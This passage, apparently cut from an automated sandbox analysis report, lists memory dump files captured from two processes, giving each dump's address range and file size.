                                                    • memory/3152-355-0x00007FF80FD70000-0x00007FF80FE28000-memory.dmp
                                                      Filesize

                                                      736KB

                                                    • memory/3152-354-0x00007FF810240000-0x00007FF81026E000-memory.dmp
                                                      Filesize

                                                      184KB

                                                    • memory/3152-353-0x00007FF801130000-0x00007FF8014A8000-memory.dmp
                                                      Filesize

                                                      3.5MB

                                                    • memory/3152-351-0x00007FF800F10000-0x00007FF801087000-memory.dmp
                                                      Filesize

                                                      1.5MB

                                                    • memory/3152-350-0x00007FF810270000-0x00007FF810293000-memory.dmp
                                                      Filesize

                                                      140KB

                                                    • memory/3152-349-0x00007FF8102A0000-0x00007FF8102B9000-memory.dmp
                                                      Filesize

                                                      100KB

                                                    • memory/3152-348-0x00007FF810450000-0x00007FF81047D000-memory.dmp
                                                      Filesize

                                                      180KB

                                                    • memory/3152-347-0x00007FF816610000-0x00007FF81661F000-memory.dmp
                                                      Filesize

                                                      60KB

                                                    • memory/3152-310-0x00007FF801130000-0x00007FF8014A8000-memory.dmp
                                                      Filesize

                                                      3.5MB

                                                    • memory/3216-194-0x00000223780D0000-0x00000223780D8000-memory.dmp
                                                      Filesize

                                                      32KB